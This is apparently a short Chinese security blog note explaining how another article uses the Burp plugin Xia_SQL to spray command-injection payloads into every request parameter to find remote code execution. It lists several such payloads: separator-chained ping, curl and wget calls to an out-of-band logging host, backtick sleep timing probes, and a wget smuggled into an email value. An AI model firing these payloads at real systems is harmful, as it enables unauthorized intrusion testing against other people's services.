看了半天,发现了该文章的核心思想:利用Xia_SQL的暴力插入各种参数的功能,配合自己的神奇payload,达到FUZZ参数,发觉RCE的效果。
从这个思路出发,你就能看懂作者给出的几个payload(看了半天不知道跟SQL注入有啥关系,实际上是没关系,只是借用了该插件的功能)
;ping ac1s8h4y.eyes.sh|ping ac1s8h4y.eyes.sh&ping ac1s8h4y.eyes.sh
;curl http://ac1s8h4y.eyes.sh|curl http://ac1s8h4y.eyes.sh&curl http://ac1s8h4y.eyes.sh
`sleep(5)`
;`sleep(5)`|`sleep(5)`&`sleep(5)`
`wget ac1s8h4y.eyes.sh`@qq.com
阅读到这句话实际上也就发现了本文的核心思想:
so我们主要利用这个插件给所有的参数插满payload
不过值得一提的是,这个插件:RCEFuzzer)该款工具很专业,但是配置起来比这个要麻烦一些,看个人了。
https://mp.weixin.qq.com/s/Ykdu7drNgh6janzEL1QK7g